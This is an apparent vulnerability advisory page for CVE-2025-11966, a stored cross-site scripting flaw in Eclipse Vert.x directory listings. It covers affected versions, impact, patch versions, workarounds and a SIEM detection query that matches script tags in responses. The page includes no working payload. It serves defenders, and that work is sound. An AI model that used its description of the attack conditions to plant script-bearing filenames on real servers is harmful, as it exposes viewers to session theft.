CVE-2025-11966 – This stored XSS vulnerability in Eclipse Vert.x... (How to Fix)

Q: What is the severity of CVE-2025-11966?

CVE-2025-11966 has a CVSS score of 6.4 (MEDIUM). This stored XSS vulnerability in Eclipse Vert.x allows attackers to inject malicious scripts into directory listings when they can create or rename files in served paths. Users viewing these directory listings will execute the attacker's scripts in their browser context. Affects Vert.x deployments with directory listing enabled.

📋 TL;DR

This stored XSS vulnerability in Eclipse Vert.x allows attackers to inject malicious scripts into directory listings when they can create or rename files in served paths. Users viewing these directory listings will execute the attacker's scripts in their browser context. Affects Vert.x deployments with directory listing enabled.

💻 Affected Systems

Products:

Eclipse Vert.x

Versions: 4.0.0 through 4.5.21, 5.0.0 through 5.0.4

Operating Systems: All

Default Config Vulnerable: ✅ No

Notes: Only vulnerable when directory listing feature is explicitly enabled in configuration.

📦 What is this software?

Vert.x by Eclipse

View all CVEs affecting Vert.x →

Vert.x by Eclipse

View all CVEs affecting Vert.x →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal session cookies, perform actions as authenticated users, redirect to malicious sites, or deploy malware to users' systems.

🟠

Likely Case

Session hijacking, credential theft, or defacement of directory listing pages through script injection.

🟢

If Mitigated

Limited impact if directory listing is disabled or proper input validation is implemented.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: MEDIUM

Requires ability to create or rename files/directories in served path, plus directory listing enabled.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Vert.x 4.5.22 and 5.0.5

Vendor Advisory: https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/303

Restart Required: No

Instructions:

1. Update Vert.x to version 4.5.22 or 5.0.5. 2. Update dependencies in your project. 3. Rebuild and redeploy application.

🔧 Temporary Workarounds

Disable directory listing

all

Turn off the directory listing feature in Vert.x configuration

Set directoryListingEnabled: false in StaticHandler configuration

Implement input validation

all

Add custom middleware to sanitize file/directory names before display

🧯 If You Can't Patch

Disable directory listing feature immediately
Implement WAF rules to detect and block XSS payloads in directory listings

🔍 How to Verify

Check if Vulnerable:

Check if directory listing is enabled and Vert.x version is within affected range

Check Version:

Check pom.xml or build.gradle for vertx-core dependency version

Verify Fix Applied:

Verify Vert.x version is 4.5.22+ or 5.0.5+ and test directory listing with malicious filenames

📡 Detection & Monitoring

Log Indicators:

Unusual file creation patterns in served directories
Directory listing requests with suspicious parameters

Network Indicators:

HTTP responses containing unescaped HTML in directory listings
Script tags in directory listing responses

SIEM Query:

http.response.body:*<script* AND http.response.body:*directory* AND http.user_agent:*Vert.x*

📊 Metadata

CVE ID: CVE-2025-11966

CVSS v3 Score: 6.4 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

CWE: CWE-79

EPSS Score: 0.04% exploit probability (12.4th percentile)

Published: October 22, 2025

Last Updated: January 20, 2026

🔗 References

https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/303 Issue Tracking,Vendor Advisory,Exploit

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-11966, you might also want to check these: